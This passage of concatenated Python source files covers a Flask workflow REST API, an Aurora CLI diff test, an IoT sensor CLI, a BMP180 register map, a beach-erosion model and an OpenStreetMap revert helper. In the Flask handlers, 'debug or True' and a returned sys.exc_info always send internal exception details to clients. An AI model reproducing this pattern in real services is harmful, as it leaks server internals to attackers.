params['user_id'] = g.user.id
params['user_login'] = g.user.login
params['user_name'] = g.user.name
params['platform_id'] = params.get('platform', {}).get(
'id') or params.get('platform_id')
params['subset_id'] = params.get('subset_id')
workflow = request_schema.load(params)
else:
return result, result_code
try:
db.session.add(workflow)
db.session.flush()
update_port_name_in_flows(db.session, workflow.id)
result, result_code = response_schema.dump(
workflow), 200
if workflow.is_template:
workflow.template_code = result
db.session.add(workflow)
db.session.commit()
except ValidationError as e:
result = {
'status': 'ERROR',
'message': gettext('Validation error'),
'errors': e.messages
}
except Exception as e:
log.exception('Error in POST')
result, result_code = dict(status="ERROR",
message="Internal error"), 500
if current_app.debug or True:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
class WorkflowDetailApi(Resource):
""" REST API for a single instance of class Workflow """
@staticmethod
@requires_auth
def get(workflow_id):
workflow = get_workflow(workflow_id)
if workflow is not None:
return WorkflowItemResponseSchema().dump(workflow)
else:
return dict(status="ERROR", message="Not found"), 404
@staticmethod
@requires_auth
def delete(workflow_id):
result, result_code = dict(status="ERROR", message="Not found"), 404
filtered = filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
workflow = filtered.filter(Workflow.id == workflow_id).first()
if workflow is not None:
try:
# db.session.delete(workflow)
# soft delete
workflow.enabled = False
db.session.commit()
result, result_code = dict(status="OK", message="Deleted"), 200
except Exception as e:
log.exception('Error in DELETE')
result, result_code = dict(status="ERROR",
message="Internal error"), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
@staticmethod
@requires_auth
def patch(workflow_id):
result = dict(status="ERROR", message="Insufficient data")
result_code = 404
try:
if request.json:
data = request.json
save_history = data.get('history', '1') == '1'
request_schema = partial_schema_factory(
WorkflowCreateRequestSchema)
for task in data.get('tasks', {}):
task['forms'] = {k: v for k, v in
list(task['forms'].items())
if v.get('value') is not None or
v.get('publishing_enabled') == True}
task['operation_id'] = task['operation']['id']
for variable in data.get('variables', []):
variable['parameters'] = json.dumps(variable['parameters'])
# Ignore missing fields to allow partial updates
params = {}
params.update(data)
if 'platform_id' in params and params['platform_id'] is None:
params.pop('platform_id')
if 'user' in params:
del params['user']
# Only with permission
if not ('ADMINISTRATOR' in g.user.permissions) and \
'is_system_template' in params:
del params['is_system_template']
# Keeps the same owner
# params['user_id'] = g.user.id
# params['user_login'] = g.user.login
# params['user_name'] = g.user.name
if params.get('forms') is not None:
params['forms'] = json.dumps(params['forms'])
else:
params['forms'] = '{}'
response_schema = WorkflowItemResponseSchema()
workflow = request_schema.load(params, partial=True)
filtered = filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
temp_workflow = filtered.filter(
Workflow.id == workflow_id).first()
if temp_workflow is not None:
workflow.id = workflow_id
workflow.updated = datetime.datetime.utcnow()
workflow = db.session.merge(workflow)
if (workflow.publishing_enabled and
workflow.publishing_status is None):
workflow.publishing_status = PublishingStatus.EDITING
db.session.flush()
update_port_name_in_flows(db.session, workflow.id)
db.session.commit()
historical_data = json.dumps(
response_schema.dump(workflow))
# if workflow.is_template:
# workflow.template_code = historical_data
if save_history:
history = WorkflowHistory(
user_id=g.user.id, user_name=g.user.name,
user_login=g.user.login,
version=workflow.version,
workflow=workflow, content=historical_data)
db.session.add(history)
db.session.commit()
if workflow is not None:
result, result_code = dict(
status="OK", message="Updated",
data=response_schema.dump(
workflow)), 200
else:
result = dict(status="ERROR",
message="Not found")
except ValidationError as e:
result = {
'status': 'ERROR',
'message': gettext('Validation error'),
'errors': e.messages
}
except Exception as e:
log.exception('Error in PATCH')
result_code = 500
import sys
result = {'status': "ERROR", 'message': sys.exc_info()[1]}
return result, result_code
class WorkflowHistoryApi(Resource):
@staticmethod
@requires_auth
def post(workflow_id):
result, result_code = dict(status="ERROR", message="Not found"), 404
params = request.json
if 'version' in params:
workflow = get_workflow(workflow_id)
if workflow.user_id == g.user.id:
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id,
WorkflowHistory.version == int(params['version'])).one()
# return json.load(history.content), 200
old = json.loads(history.content)
old['platform_id'] = old['platform']['id']
old['user_id'] = g.user.id
old['user_login'] = g.user.login
old['user_name'] = g.user.name
del old['user']
for i, task in enumerate(old['tasks']):
task['operation_id'] = task['operation']['id']
if not task.get('name'):
task['name'] = '{} {}'.format(task['operation']['name'],
i)
rw = WorkflowCreateRequestSchema().load(old)
if rw.errors:
result_code = 400
result = dict(
status="ERROR",
message="Version {} is not compatible anymore.".format(
params['version']))
else:
result = old
result_code = 200
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
return result, result_code
@staticmethod
@requires_auth
def get(workflow_id):
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id).order_by(
WorkflowHistory.date.desc()).limit(20)
only = ('id', 'date', 'version', 'user_name')
return {'data': WorkflowHistoryListResponseSchema(
many=True, only=only).dump(history)}
class WorkflowAddFromTemplateApi(Resource):
@staticmethod
@requires_auth
def post():
params = request.json
if 'template_id' in params and params.get('template_id'):
workflow_id = int(params.get('template_id'))
workflow = get_workflow(workflow_id)
if workflow.user_id == g.user.id or workflow.is_system_template:
# clone workflow
response_schema = WorkflowItemResponseSchema()
cloned = json.loads(
json.dumps(response_schema.dump(workflow)))
cloned['platform_id'] = cloned['platform']['id']
cloned['user_id'] = g.user.id
cloned['user_login'] = g.user.login
cloned['user_name'] = g.user.name
cloned['name'] = params.get('name', 'workflow')
cloned['is_template'] = False
cloned['is_system_template'] = False
# Marshmallow converts JSON value to dict and it causes
# problems when saving data (issue #136);
cloned['forms'] = workflow.forms
del cloned['user']
old_task_ids = {}
for i, task in enumerate(cloned['tasks']):
new_task_id = str(uuid.uuid4())
old_task_ids[task['id']] = new_task_id
task['id'] = new_task_id
task['operation_id'] = task['operation']['id']
if not task.get('name'):
task['name'] = '{} {}'.format(task['operation']['name'],
i)
for flow in cloned['flows']:
flow['source_id'] = old_task_ids[flow['source_id']]
flow['target_id'] = old_task_ids[flow['target_id']]
request_schema = WorkflowCreateRequestSchema()
form = request_schema.load(cloned)
if not form.errors:
new_workflow = form
db.session.add(new_workflow)
db.session.flush()
db.session.commit()
result, result_code = response_schema.dump(
new_workflow), 200
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
else:
result, result_code = dict(status="ERROR",
message="Not authorized"), 401
else:
result, result_code = dict(status="ERROR", message="Not found"), 404
return result, result_code
@staticmethod
@requires_auth
def get(workflow_id):
history = WorkflowHistory.query.filter(
WorkflowHistory.workflow_id == workflow_id).order_by(
WorkflowHistory.date.desc()).limit(20)
only = ('id', 'date', 'version', 'user_name')
return {'data': WorkflowHistoryListResponseSchema(
many=True, only=only).dump(history)}
class WorkflowPermissionApi(Resource):
""" REST API for sharing a Workflow """
@staticmethod
@requires_auth
def post(workflow_id, user_id):
result, result_code = dict(
status="ERROR",
message=gettext('Missing json in the request body')), 400
if request.json is not None:
form = request.json
to_validate = ['permission', 'user_name', 'user_login']
error = False
for check in to_validate:
if check not in form or form.get(check, '').strip() == '':
result, result_code = dict(
status="ERROR", message=gettext('Validation error'),
errors={'Missing': check}), 400
error = True
break
if check == 'permission' and form.get(
'permission') not in list(PermissionType.values()):
result, result_code = dict(
status="ERROR", message=gettext('Validation error'),
errors={'Invalid': check}), 400
error = True
break
if not error:
try:
filtered = _filter_by_permissions(
Workflow.query, [PermissionType.WRITE])
workflow = filtered.filter(
Workflow.id == workflow_id).first()
if workflow is not None:
conditions = [WorkflowPermission.workflow_id ==
workflow_id,
WorkflowPermission.user_id == user_id]
permission = WorkflowPermission.query.filter(
*conditions).first()
action_performed = 'Added'
if permission is not None:
action_performed = 'Updated'
permission.permission = form['permission']
else:
permission = WorkflowPermission(
workflow=workflow, user_id=user_id,
user_name=form['user_name'],
user_login=form['user_login'],
permission=form['permission'])
db.session.add(permission)
db.session.commit()
result, result_code = {'message': action_performed,
'status': 'OK'}, 200
else:
result, result_code = dict(
status="ERROR",
message=gettext("%(type)s not found.",
type=gettext('Data source'))), 404
except Exception as e:
log.exception('Error in POST')
result, result_code = dict(status="ERROR",
message=gettext(
"Internal error")), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
@staticmethod
@requires_auth
def delete(workflow_id, user_id):
result, result_code = dict(status="ERROR",
message=gettext("%(type)s not found.",
type=gettext(
'Data source'))), 404
filtered = _filter_by_permissions(Workflow.query,
[PermissionType.WRITE])
workflow = filtered.filter(Workflow.id == workflow_id).first()
if workflow is not None:
permission = WorkflowPermission.query.filter(
WorkflowPermission.workflow_id == workflow_id,
WorkflowPermission.user_id == user_id).first()
if permission is not None:
try:
db.session.delete(permission)
db.session.commit()
result, result_code = dict(
status="OK",
message=gettext("%(what)s was successively deleted",
what=gettext('Workflow'))), 200
except Exception as e:
log.exception('Error in DELETE')
result, result_code = dict(status="ERROR",
message=gettext(
"Internal error")), 500
if current_app.debug:
result['debug_detail'] = str(e)
db.session.rollback()
return result, result_code
| StarcoderdataPython |
3218915 | <filename>Chapter4/Aurora/src/test/python/apache/aurora/client/cli/test_diff.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import contextlib
import os
import textwrap
from mock import Mock, call, patch
from pystachio import Empty
from apache.aurora.client.api import SchedulerProxy
from apache.aurora.client.cli import EXIT_OK
from apache.aurora.client.cli.jobs import DiffCommand
from apache.aurora.client.cli.options import TaskInstanceKey
from apache.aurora.config import AuroraConfig
from apache.aurora.config.schema.base import Job
from apache.thermos.config.schema_base import MB, Process, Resources, Task
from .util import AuroraClientCommandTest, FakeAuroraCommandContext, mock_verb_options
from gen.apache.aurora.api.constants import ACTIVE_STATES
from gen.apache.aurora.api.ttypes import (
ConfigGroup,
GetJobUpdateDiffResult,
PopulateJobResult,
Range,
ResponseCode,
Result,
ScheduleStatusResult,
TaskQuery
)
class TestDiffCommand(AuroraClientCommandTest):
def setUp(self):
self._command = DiffCommand()
self._mock_options = mock_verb_options(self._command)
self._mock_options.instance_spec = TaskInstanceKey(self.TEST_JOBKEY, [0, 1])
self._fake_context = FakeAuroraCommandContext()
self._fake_context.set_options(self._mock_options)
self._mock_api = self._fake_context.get_api("test")
@classmethod
def get_job_config(self, is_cron=False):
return AuroraConfig(job=Job(
cluster='west',
role='bozo',
environment='test',
name='the_job',
service=True if not is_cron else False,
cron_schedule='* * * * *' if is_cron else Empty,
task=Task(
name='task',
processes=[Process(cmdline='ls -la', name='process')],
resources=Resources(cpu=1.0, ram=1024 * MB, disk=1024 * MB)
),
instances=3,
))
@classmethod
def create_status_response(cls):
resp = cls.create_simple_success_response()
resp.result = Result(
scheduleStatusResult=ScheduleStatusResult(tasks=set(cls.create_scheduled_tasks())))
return resp
@classmethod
def create_failed_status_response(cls):
return cls.create_blank_response(ResponseCode.INVALID_REQUEST, 'No tasks found for query')
@classmethod
def populate_job_config_result(cls):
populate = cls.create_simple_success_response()
populate.result = Result(populateJobResult=PopulateJobResult(
taskConfig=cls.create_scheduled_tasks()[0].assignedTask.task))
return populate
@classmethod
def get_job_update_diff_result(cls):
diff = cls.create_simple_success_response()
task = cls.create_task_config('foo')
diff.result = Result(getJobUpdateDiffResult=GetJobUpdateDiffResult(
add=set([ConfigGroup(
config=task,
instances=frozenset([Range(first=10, last=10), Range(first=12, last=14)]))]),
remove=frozenset(),
update=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=11, last=11)]))]),
unchanged=frozenset([ConfigGroup(
config=task,
instances=frozenset([Range(first=0, last=9)]))])
))
return diff
def test_service_diff(self):
config = self.get_job_config()
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.return_value = self.get_job_update_diff_result()
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert "\n".join(self._fake_context.get_out()) == textwrap.dedent("""\
This job update will:
add instances: [10], [12-14]
update instances: [11]
with diff:\n\n
not change instances: [0-9]""")
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_service_diff_old_api(self):
config = self.get_job_config()
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.get_job_update_diff.side_effect = SchedulerProxy.ThriftInternalError("Expected")
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.get_job_update_diff.mock_calls == [
call(config, self._mock_options.instance_spec.instance)
]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
def test_cron_diff(self):
config = self.get_job_config(is_cron=True)
query = TaskQuery(
jobKeys=[self.TEST_JOBKEY.to_thrift()],
statuses=ACTIVE_STATES)
self._fake_context.get_job_config = Mock(return_value=config)
self._mock_api.populate_job_config.return_value = self.populate_job_config_result()
self._mock_api.query.return_value = self.create_empty_task_result()
self._mock_api.build_query.return_value = query
with contextlib.nested(
patch('subprocess.call', return_value=0),
patch('json.loads', return_value={})) as (subprocess_patch, _):
result = self._command.execute(self._fake_context)
assert result == EXIT_OK
assert self._mock_api.populate_job_config.mock_calls == [call(config)]
assert self._mock_api.query.mock_calls == [call(query)]
assert subprocess_patch.call_count == 1
assert subprocess_patch.call_args[0][0].startswith(
os.environ.get('DIFF_VIEWER', 'diff') + ' ')
| StarcoderdataPython |
156271 | #!/usr/bin/env python3
"""
Command line interface for the Ivaldi IoT scientific sensor client.
"""
# Standard library imports
import argparse
import sys
# Local imports
import ivaldi
import ivaldi.monitor
import ivaldi.link
def generate_arg_parser():
"""
Generate the argument parser for Ivaldi.
Returns
-------
arg_parser : argparse.ArgumentParser
The generated argument parser instance.
"""
parser_main = argparse.ArgumentParser(
description="A lightweight client for monitoring IoT sensors.",
argument_default=argparse.SUPPRESS)
parser_main.add_argument(
"--version", action="store_true",
help="Print the Ivaldi version and exit")
subparsers = parser_main.add_subparsers(
title="Commands", help="Subcommand to execute", metavar="Command")
parser_monitor = subparsers.add_parser(
"monitor", help="Monitor the sensor status and print to the terminal",
argument_default=argparse.SUPPRESS)
parser_monitor.set_defaults(func=ivaldi.monitor.start_monitoring)
parser_send = subparsers.add_parser(
"send", help="Monitor the connected sensor and send the data via UART",
argument_default=argparse.SUPPRESS)
parser_send.set_defaults(func=ivaldi.link.send_monitoring_data)
parser_recieve = subparsers.add_parser(
"recieve", help="Recieve and print the IoT sensor data via UART",
argument_default=argparse.SUPPRESS)
parser_recieve.set_defaults(func=ivaldi.link.recieve_monitoring_data)
for parser in [parser_monitor, parser_send]:
parser.add_argument(
"pin_rain", type=int,
help="GPIO pin to use for rain gauge, in BCM (Broadcom) numbering")
parser.add_argument(
"pin_wind", type=int,
help="GPIO pin to use for wind speed, in BCM (Broadcom) numbering")
parser.add_argument(
"channel_wind", type=int,
help="ADC channel (0-3) to use for the wind direction sensor")
parser.add_argument(
"channel_soil", type=int,
help="ADC channel (0-3) to use for the soil moisture sensor")
parser.add_argument(
"--period-s", type=float, help="Update period, in s")
for parser in [parser_monitor, parser_recieve]:
parser.add_argument(
"--output-path", help="CSV file to output to, none if not passed")
parser.add_argument(
"--log", action="store_true",
help="Print every update to a new line")
for parser in [parser_send, parser_recieve]:
parser.add_argument(
"--serial-device",
help="The UART device to use (e.g. '/dev/ttyAMA0')")
return parser_main
def main():
"""
Parse command line arguments and start the sensor monitor mainloop.
Returns
-------
None.
"""
arg_parser = generate_arg_parser()
parsed_args = arg_parser.parse_args()
if getattr(parsed_args, "version", None):
print(f"Ivaldi version {ivaldi.__version__}")
sys.exit()
func_to_dispatch = parsed_args.func
del parsed_args.func
func_to_dispatch(**vars(parsed_args))
if __name__ == "__main__":
main()
| StarcoderdataPython |
1783280 | # Copyright (C) 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Auto-generated file for BMP180 v0.1.0.
# Generated from peripherals/BMP180.yaml using Cyanobyte Codegen v0.1.0
from i2cdevice import Device, Register, BitField
I2C_ADDR = 119
CONTROL = Register('CONTROL', 244, read_only=False, bitwidth=8)
PRESSURECALAC1 = Register('PRESSURECALAC1', 170, read_only=True, bitwidth=16)
PRESSURECALAC2 = Register('PRESSURECALAC2', 172, read_only=True, bitwidth=16)
PRESSURECALVB1 = Register('PRESSURECALVB1', 182, read_only=True, bitwidth=16)
PRESSURECALVB2 = Register('PRESSURECALVB2', 184, read_only=True, bitwidth=16)
RESULT = Register('RESULT', 246, read_only=True, bitwidth=16)
TEMPCAL3 = Register('TEMPCAL3', 174, read_only=True, bitwidth=16)
TEMPCAL4 = Register('TEMPCAL4', 176, read_only=True, bitwidth=16)
TEMPCAL5 = Register('TEMPCAL5', 178, read_only=True, bitwidth=16)
TEMPCAL6 = Register('TEMPCAL6', 180, read_only=True, bitwidth=16)
TEMPCALMC = Register('TEMPCALMC', 188, read_only=True, bitwidth=16)
TEMPCALMD = Register('TEMPCALMD', 190, read_only=True, bitwidth=16)
bmp180 = Device(I2C_ADDR, registers=(
CONTROL,
PRESSURECALAC1,
PRESSURECALAC2,
PRESSURECALVB1,
PRESSURECALVB2,
RESULT,
TEMPCAL3,
TEMPCAL4,
TEMPCAL5,
TEMPCAL6,
TEMPCALMC,
TEMPCALMD
)) | StarcoderdataPython |
184985 | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 24 15:53:51 2016
@author: jdorvinen
"""
import numpy as np
def kriebel_dean(w_cm, B, D, W, m, S, T_d, H_b, gamma=0.78):
'''Calculates storm erosion based on the method presented in,
<NAME>., and <NAME>., 'Convolution method for time-dependent
beach-profile response' J. Waterway, Port, Coastal, Ocean Eng., 1993,
119(2): 204-226
Inputs:
REQUIRED \n
w_cm = sediment fall velocity (cm/s) \n
B = Berm height above mean sea-level (meters) \n
D = Dune height (meters) \n
W = Width of the back-shore (meters) \n
m = Linear beach face slope (m/m) \n
S = Water-level rise ('storm-surge') (meters) \n
T_d = Storm duration (hours) \n
H_b = Breaking wave height (meters) \n
OPTIONAL \n
gamma = Breaker index, usually taken to be 0.78-1.0 \n
Returns:
V_max = Maximum shoreline erosion volume (m**3) \n
R_max = Maximum shoreline erosion distance (m)
'''
# Constants
g = 9.8066 # gravitational acceleration (m/s/s)
# Sediment data
#d_50 = 0.3 # mass-mean sediment grain-size diameter (mm)
w_cm = w_cm # sediment fall velocity (cm/s)
w = w_cm/100 # m/sec
# Profile data
# Based on equilibrium profile of the form 'x=(h/A)**(3/2)', where h = the
# water depth at a distance x offshore from the still-water level
A = 2.25*((w**2)/g)**(1/3) # Eq. 15 'parameter governs profile steepness'
# valid for sand where 0.1mm < d_50 < 0.4mm
B = B # Berm height above mean sea-level (meters)
D = D # Dune height (meters)
W = W # Width of the back-shore (meters)
m = m # Linear beach face slope (m/m)
# Storm data
S = S # given water-level rise ('storm-surge') (meters)
T_d = T_d # Storm duration (hours)
gamma = gamma # Breaker index, usually taken to be 0.78-1.0.
H_b = H_b # Breaking wave height (meters)
h_b = H_b/gamma # Breaking depth, assumed to remain constant (meters)
# Active profile width 'x_b', x_0 = the distance from the still-water
# shoreline to the virtual origin of the concave equilibrium profile form,
# given by x_0 = h_T/3m, where h_T is the depth at which the linear slope
# is tangent to the concave profile, which may be shown to equal
# 4A**3/9m**2.
h_T = (4/9)*(A**3/m**2) # Eq. 16b_1
x_0 = h_T/(3*m) # Eq. 16b_2
x_b = x_0+(h_b/A)**(3/2) # Eq. 23
# Calculate erosion potential
# Maximum erosion potential, 'R_inf', and maximum potential volume eroded,
# 'V_inf', based on an equilibrium profile with a linear beach slope.
#R_inf = S*(x_b-(h_b/m)) / (B+h_b-(S/2)) # Eq. 22
#V_inf = R_inf*B + (S**2)/(2*m) - (2/5)*(S**(5/2))/(A**(3/2)) # Eq. 24
# Calculate maximum erosion potential 'R_inf' and maximum potential volume
# eroded 'V_inf' based on an equilibrium profile with a dune.
# Dune with no back-shore.
# R_inf = S*(x_b-(h_b/m))/(B+D+h_b-(S/2)) # Eq. 25
# Dune with a wide back-shore.
R_inf = (S*(x_b-(h_b/m)) - (W*(B+h_b-(S/2)))) / (B+D+h_b-(S/2)) # Eq. 26
# Volume eroded
V_inf = R_inf*D + (R_inf+W)*(B-S) # Eq. 27 --> used in K&D examples
# Volume eroded above original sea level #Eq. 28
# V_minf = R_inf*D +(R_inf+W)*B+(S**2)/(2*m)-(2/5)*(S**(5/2))/(A**(3/2))
# Calculate erosion timescale
# Time scale of profile response
C_1 = 320 # Empirical coefficient from Kriebel and Dean 1993
# Time scale parameter # Eq.31 (sec)
T_sec = ((H_b**(3/2))/(g**(1/2) * A**3)) / (1+(h_b/B)+(m*x_b)/h_b)
T_s = C_1*T_sec/3600 # convert seconds to hours
# Combine erosion potential and timescale
# Beach response to idealized storm surge
alpha = 1/T_s
sigma = np.pi/T_d
beta = 2*sigma/alpha # 2*np.pi*(T_s/T_d)
# Eq. 10
# R_t/R_inf=0.5*(1 - \
# (beta**2/(1+beta**2))*np.exp(-(2*sigma*t)/beta) - \
# (1/(1+beta**2))*(np.cos(2*sigma*t)+beta*np.sin(2*sigma*t)))
# Setting time derivative of Eq. 10 to zero leads to Eq. 12, where t_max is
# the time at which maximum erosion will take place.
def find_t_max(t_max):
""" doc string """
zero = np.cos(2*sigma*t_max) - \
(1/beta)*np.sin(2*sigma*t_max) - \
np.exp(-(2*sigma*t_max)/beta) # Eq. 12
return zero
# This can then be solved iteratively to find the time at which maximum
# erosion occurs, 't_max' (hrs)
import scipy.optimize as opt
t_max = opt.brentq(find_t_max,
a=T_d/2,
b=T_d)
# Finally calculate maximum shoreline recession and volumetric erosion for
# the given storm parameters.
R_max = R_inf*0.5*(1-np.cos(2*sigma*t_max)) # Eq. 13
V_max = V_inf*(R_max/R_inf)
# Turn this block on if need to debug
'''
print("R_max: {:.1f} (m)".format(R_max))
print("R_inf: {:.1f} (m)".format(R_inf))
print("R_max/R_inf: {:.2f}".format(R_max/R_inf))
print("V_max: {:.1f} (m**3/m)".format(V_max))
print("V_inf: {:.1f} (m**#/m)".format(V_inf))
print("T_s: {:.2f} (h)".format(T_s))
print("t_max: {:.1f} (h)".format(t_max))
print("A: {:.3f}".format(A))
print("alpha: {:.3f} (1/h)".format(alpha))
print("beta: {:.3f}".format(beta))
print("sigma: {:.3f}".format(sigma))
'''
return (V_max, R_max, V_inf, R_inf)
def recovery(V_max, interim, T_a=400):
'''Calculate eroded sand-volume post recovery during storm interim.
Inputs:
V_max = Initially erroded volume (m**3)
interim = Period of calm between storms (h)
T_a = Characteristic accretive timescale (h)
Outputs:
V_recoverd = Eroded volume remaining after recovery (m**3)
'''
from numpy import exp
V_recovered = V_max*exp(-1*interim/T_a) # Eq. 28 Callaghan et al. 2008
return V_recovered
| StarcoderdataPython |
4840484 | # Common constants and functions for reverting scripts.
import getpass
import base64
import logging
import re
import requests
try:
from lxml import etree
except ImportError:
try:
import xml.etree.cElementTree as etree
except ImportError:
import xml.etree.ElementTree as etree
try:
input = raw_input
except NameError:
pass
API_ENDPOINT = 'https://api.openstreetmap.org/api/0.6/'
class HTTPError(Exception):
def __init__(self, code, message):
self.code = code
self.message = message
def __str__(self):
return 'HTTPError({}, {})'.format(self.code, self.message)
class RevertError(Exception):
def __init__(self, msg):
self.message = msg
def __str__(self):
return 'RevertError({})'.format(self.message)
def api_request(endpoint, method='GET', sysexit_message=None,
raw_result=False, headers=None, **kwargs):
if not headers:
headers = {}
headers['Content-Type'] = 'application/xml'
try:
resp = requests.request(method, API_ENDPOINT + endpoint, headers=headers, **kwargs)
resp.encoding = 'utf-8'
if resp.status_code != 200:
raise HTTPError(resp.status_code, resp.text)
if resp.content and not raw_result:
return etree.fromstring(resp.content)
except Exception as e:
if sysexit_message is not None:
raise RevertError(': '.join((sysexit_message, str(e))))
raise e
return resp.text
def read_auth():
"""Read login and password from keyboard, and prepare an basic auth header."""
ok = False
while not ok:
login = input('OSM Login: ')
auth_header = 'Basic {0}'.format(base64.b64encode('{0}:{1}'.format(
login, getpass.getpass('OSM Password: ')).encode('utf-8')).decode('utf-8'))
try:
result = api_request('user/details', headers={'Authorization': auth_header})
ok = len(result) > 0
except Exception as e:
logging.error(e)
if not ok:
logging.warning('You must have mistyped. Please try again.')
return auth_header
def obj_to_dict(obj):
"""Converts XML object to an easy to use dict."""
if obj is None:
return None
res = {}
res['type'] = obj.tag
res['id'] = obj.get('id')
res['version'] = int(obj.get('version'))
res['deleted'] = obj.get('visible') == 'false'
if obj.tag == 'node' and 'lon' in obj.keys() and 'lat' in obj.keys():
res['coords'] = (obj.get('lon'), obj.get('lat'))
res['tags'] = {tag.get('k'): tag.get('v') for tag in obj.findall('tag')}
if obj.tag == 'way':
res['refs'] = [x.get('ref') for x in obj.findall('nd')]
elif obj.tag == 'relation':
res['refs'] = [(x.get('type'), x.get('ref'), x.get('role')) for x in obj.findall('member')]
return res
def dict_to_obj(obj):
"""Converts object dict back to an XML element."""
if obj is None:
return None
res = etree.Element(obj['type'], {'id': str(obj['id']), 'version': str(obj['version'])})
res.set('visible', 'false' if obj['deleted'] else 'true')
if 'coords' in obj:
res.set('lon', obj['coords'][0])
res.set('lat', obj['coords'][1])
if 'tags' in obj:
for k, v in obj['tags'].items():
res.append(etree.Element('tag', {'k': k, 'v': v}))
if not obj['deleted']:
if obj['type'] == 'way':
for nd in obj['refs']:
res.append(etree.Element('nd', {'ref': nd}))
elif obj['type'] == 'relation':
for member in obj['refs']:
res.append(etree.Element('member', {'type': member[0],
'ref': member[1],
'role': member[2]}))
return res
def changes_to_osc(changes, changeset_id=None):
# Set explicit actions for each changed object
for c in changes:
if 'version' not in c or c['version'] <= 0:
c['action'] = 'create'
elif 'deleted' in c and c['deleted']:
c['action'] = 'delete'
else:
c['action'] = 'modify'
# Sort changes, so created nodes are first, and deleted are last
def change_as_key(ch):
act = ['create', 'modify', 'delete'].index(ch['action'])
typ = ['node', 'way', 'relation'].index(ch['type'])
if act == 2:
typ = 2 - typ
return '{0}{1}{2}'.format(act, typ, ch['id'])
changes.sort(key=change_as_key)
osc = etree.Element('osmChange', {'version': '0.6'})
for c in changes:
act = etree.SubElement(osc, c['action'])
el = dict_to_obj(c)
if changeset_id:
el.set('changeset', str(changeset_id))
act.append(el)
try:
return etree.tostring(osc, pretty_print=True, encoding='utf-8', xml_declaration=True)
except TypeError:
# xml.etree.ElementTree does not support pretty printing
return etree.tostring(osc, encoding='utf-8')
def changeset_xml(changeset_tags):
create_xml = etree.Element('osm')
ch = etree.SubElement(create_xml, 'changeset')
for k, v in changeset_tags.items():
ch.append(etree.Element('tag', {'k': k, 'v': v}))
return etree.tostring(create_xml)
def upload_changes(changes, changeset_tags):
"""Uploads a list of changes as tuples (action, obj_dict)."""
if not changes:
logging.info('No changes to upload.')
return False
# Now we need the OSM credentials
auth_header = read_auth()
headers = {'Authorization': auth_header}
try:
changeset_id = int(api_request(
'changeset/create', 'PUT', raw_result=True,
data=changeset_xml(changeset_tags), headers=headers,
))
logging.info('Writing to changeset %s', changeset_id)
except Exception as e:
logging.exception(e)
logging.error('Failed to create changeset: %s', e)
return False
osc = changes_to_osc(changes, changeset_id)
ok = True
try:
api_request(
'changeset/{}/upload'.format(changeset_id), 'POST',
data=osc, headers=headers
)
except HTTPError as e:
logging.error('Server rejected the changeset with code %s: %s', e.code, e.message)
if e.code == 412:
# Find the culprit for a failed precondition
m = re.search(r'Node (\d+) is still used by (way|relation)s ([0-9,]+)', e.message)
if m:
# Find changeset for the first way or relation that started using that node
pass
else:
m = re.search(r'(Way|The relation) (\d+) is .+ relations? ([0-9,]+)', e.message)
if m:
# Find changeset for the first relation that started using that way or relation
pass
else:
m = re.search(r'Way (\d+) requires .+ id in \(([0-9,]+\)', e.message)
if m:
# Find changeset that deleted at least the first node in the list
pass
else:
m = re.search(r'Relation with id (\d+) .+ due to (\w+) with id (\d+)',
e.message)
if m:
# Find changeset that added member to that relation
pass
except Exception as e:
ok = False
logging.error('Failed to upload changetset contents: %s', e)
# Not returning, since we need to close the changeset
try:
api_request('changeset/{}/close'.format(changeset_id), 'PUT', headers=headers)
except Exception as e:
logging.warning(
'Failed to close changeset (it will close automatically in an hour): %s', e)
return ok
| StarcoderdataPython |
1766596 | """ Dictionary of standard bond lengths
"""
from phydat.phycon import ANG2BOHR
# Dictionary of A-B single bond lengths
LEN_DCT = {
('H', 'H'): 0.74 * ANG2BOHR,
